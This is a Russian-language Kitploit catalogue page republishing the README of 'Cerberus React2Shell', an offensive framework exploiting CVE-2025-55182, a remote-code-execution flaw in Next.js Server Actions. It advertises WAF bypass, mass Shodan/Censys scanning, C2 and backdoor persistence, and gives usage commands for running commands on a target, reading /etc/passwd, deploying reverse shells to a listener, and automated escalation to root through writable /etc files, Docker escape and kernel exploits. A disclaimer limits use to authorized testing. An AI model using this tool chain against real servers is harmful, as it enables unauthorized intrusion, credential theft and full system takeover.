Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Cerberus-React2Shell-Scanner-Exploit — Элитный набор инструментов для эксплуатации CVE-2025-55182 (RCE в серверных компонентах React). Асинхронные полиморфные полезные нагрузки, продвинутый обход WAF/CDN, ротация прокси, массовое сканирование Shodan/Censys, авто-pwn + обратные шеллы, шаблоны Nuclei, лаборатория K8s и панель управления C2. Автор: Sudeepa Wanigarathna – строго для авторизованного тестирования на проникновение и red team. | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/cerberus-react2shell-scanner-exploit
Фреймворки для пентестаПовышение привилегийСканеры уязвимостейФреймворки для эксплойтовШелл-кодЭксплуатация веб-приложенийПост-эксплуатацияКомандование и УправлениеОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Red Teaming
Разработка Полезной Нагрузки
Лаборатории и Практика
GitHubcerberusmrxi/cerberus-react2shell-scanner-exploit

Cerberus-React2Shell-Scanner-Exploit

Репозиторий
211 месяц назадЕщё не проверено

Описание

Элитный набор инструментов для эксплуатации CVE-2025-55182 (RCE в серверных компонентах React). Асинхронные полиморфные полезные нагрузки, продвинутый обход WAF/CDN, ротация прокси, массовое сканирование Shodan/Censys, авто-pwn + обратные шеллы, шаблоны Nuclei, лаборатория K8s и панель управления C2. Автор: Sudeepa Wanigarathna – строго для авторизованного тестирования на проникновение и red team.

Поделиться

Cerberus React2Shell - Каркас эксплуатации оружия

root@kitploit:~
  ██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗   ██╗
 ██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║   ██║
 ██║      █████╗  ██████╔╝██████╔╝█████╗  ██████╔╝██║   ██║
 ██║      ██╔══╝  ██╔══██╗██╔══██╗██╔══╝  ██╔══██╗██║   ██║
 ╚██████╗ ███████╗██║  ██║██████╔╝███████╗██║  ██║╚██████╔╝
  ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝
  
         React2Shell Exploitation Framework v1.0
              Автор: Sudeepa Wanigarathna

🎯 Обзор

Профессиональный каркас эксплуатации уязвимости RCE в Server Actions Next.js (React2Shell). Демонстрирует полную цепочку атак от первоначального доступа до повышения привилегий до root.

Возможности:

  • ✅ Автоматическое обнаружение уязвимости
  • ✅ Удаленное выполнение кода (RCE)
  • ✅ Интерактивный доступ к оболочке
  • ✅ Сбор информации о системе Linux
  • ✅ Автоматическое повышение привилегий
  • ✅ Развертывание обратной оболочки
  • ✅ Загрузка/выгрузка файлов
  • ✅ Демонстрация доступа root

🚀 Быстрый старт

Основные команды RCE

root@kitploit:~
# Check vulnerability
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# Execute command
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"

Интерактивная оболочка

root@kitploit:~
python3 interactive_shell.py --target http://127.0.0.1:3000

Полная автоматизированная цепочка атак

root@kitploit:~
# Complete exploitation: RCE → Enumeration → Root Access
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

📁 Структура каркаса

root@kitploit:~
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py      # Основной движок эксплойта (400+ строк)
├── demo_exploit.py              # Автоматизированная цепочка атак (290+ строк)
├── interactive_shell.py         # Интерактивная оболочка (280+ строк)
├── reverse_shell_handler.py     # Обработчик обратной оболочки (180+ строк)
├── post_exploit/
│   ├── linux_enum.py           # Сбор информации о системе (330+ строк)
│   ├── priv_esc.py             # Повышение привилегий (320+ строк)
│   └── __init__.py
├── EXPLOITATION_GUIDE.md        # Полная документация по использованию
├── QUICKSTART.md                # Краткий справочник
└── BANNER.txt

🔥 Возможности

Основной движок эксплойта

  • Обнаружение Action ID: Автоматическое извлечение из JavaScript-бандлов
  • Множество нагрузок: варианты execSync, spawn, eval, mainModule
  • Извлечение вывода: разбор вывода команд из ответов об ошибках
  • Обход WAF: методы обфускации нагрузок

Пост-эксплуатация

  • Сбор информации о Linux: SUID/SGID-бинарники, доступные для записи пути, задачи cron, версия ядра
  • Повышение привилегий: GTFOBins, файлы /etc, доступные для записи, выход из Docker, возможности
  • Работа с файлами: загрузка/выгрузка с кодировкой base64
  • Сохранение доступа: несколько методов бэкдоров

Интерактивные инструменты

  • Интерактивная оболочка: выполнение команд в реальном времени со встроенными командами
  • Обратная оболочка: несколько типов оболочек (bash, python, nc, perl)
  • Демонстрационный режим: автоматическая демонстрация из 6 шагов

📖 Примеры использования

1. Основные команды

root@kitploit:~
# Vulnerability check
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# Execute commands
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"

# Different payload variants
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn

# With obfuscation
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate

2. Интерактивная оболочка

root@kitploit:~
# Launch shell
python3 interactive_shell.py --target http://127.0.0.1:3000

# Available commands:
# - execute <cmd>        : Execute shell command
# - enum                 : Run full enumeration
# - escalate             : Attempt privilege escalation
# - upload <local> <remote>  : Upload file
# - download <remote> <local>: Download file
# - shell <lhost> <lport>: Deploy reverse shell
# - info                 : Show session info
# - exit                 : Quit

3. Обратная оболочка

root@kitploit:~
# Terminal 1: Start listener
python3 reverse_shell_handler.py --lport 4444

# Terminal 2: Deploy shell
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
  --revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash

4. Автоматизированная демонстрация

root@kitploit:~
# Full chain: Discovery → RCE → Enum → Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

🎯 Цепочка атак

Каркас реализует полную 6-шаговую цепочку эксплуатации:

  1. Обнаружение — извлечение идентификаторов Server Action из JavaScript-бандлов
  2. Эксплуатация — поиск рабочего Action ID и достижение RCE
  3. Проверка — подтверждение выполнения командой id
  4. Сбор информации — получение данных о системе, SUID-бинарников, доступных для записи путей
  5. Повышение привилегий — автоматическая эксплуатация векторов повышения привилегий
  6. Демонстрация — подтверждение доступа root чтением /etc/shadow и выводом содержимого /root

🛡️ Методы повышения привилегий

Реализованные способы

  1. SUID-бинарники (GTFOBins)

    • find, vim, python, perl, bash, awk, sed, less, more, nmap
  2. Файлы /etc с возможностью записи

    • /etc/passwd — добавление нового пользователя с правами root
    • /etc/shadow — сброс пароля root
    • /etc/sudoers — предоставление sudo без пароля
  3. Выход из Docker

    • Эксплуатация доступного сокета Docker
    • Прорыв из привилегированного контейнера
  4. Эксплойты ядра

    • DirtyCow (CVE-2016-5195)
    • Dirty Pipe (CVE-2022-0847)
    • PwnKit (CVE-2021-4034)
  5. Возможности Linux

    • Эксплуатация CAP_SETUID, CAP_DAC_OVERRIDE

📊 Статистика

  • Всего строк кода: 1 800+
  • Модули: 8
  • Методы повышения привилегий: 5
  • Варианты нагрузок: 4
  • Типы оболочек: 4 (bash, python, nc, perl)

⚙️ Требования

root@kitploit:~
pip install -r requirements.txt

Зависимости:

  • requests
  • colorama

📚 Документация

  • EXPLOITATION_GUIDE.md — полное руководство по использованию с примерами
  • QUICKSTART.md — краткий справочник по основным командам

⚠️ Отказ от ответственности

ПРЕДУПРЕЖДЕНИЕ: Этот инструмент предназначен только для авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам является незаконным. Используйте только в системах, которыми вы владеете или на тестирование которых имеете явное письменное разрешение.

Автор не несет ответственности за неправомерное использование этого инструмента. Используйте на свой страх и риск.

🎓 Образовательная цель

Этот каркас предназначен для:

  • Исследователей безопасности, изучающих уязвимости Next.js
  • Специалистов по пентесту с разрешением
  • Обучения безопасности и CTF-задач
  • Исследований уязвимостей в контролируемой лабораторной среде

📄 Лицензия

MIT License (только для образовательных целей)

👤 Автор

Sudeepa Wanigarathna

  • Эксперт по разработке эксплойтов
  • Исследователь безопасности
  • Специалист по пентесту

Версия: 1.0
Последнее обновление: Декабрь 2025
Статус лаборатории: http://127.0.0.1:3000 (Работает)

Подробные инструкции по использованию см. в EXPLOITATION_GUIDE.md

Скачать инструмент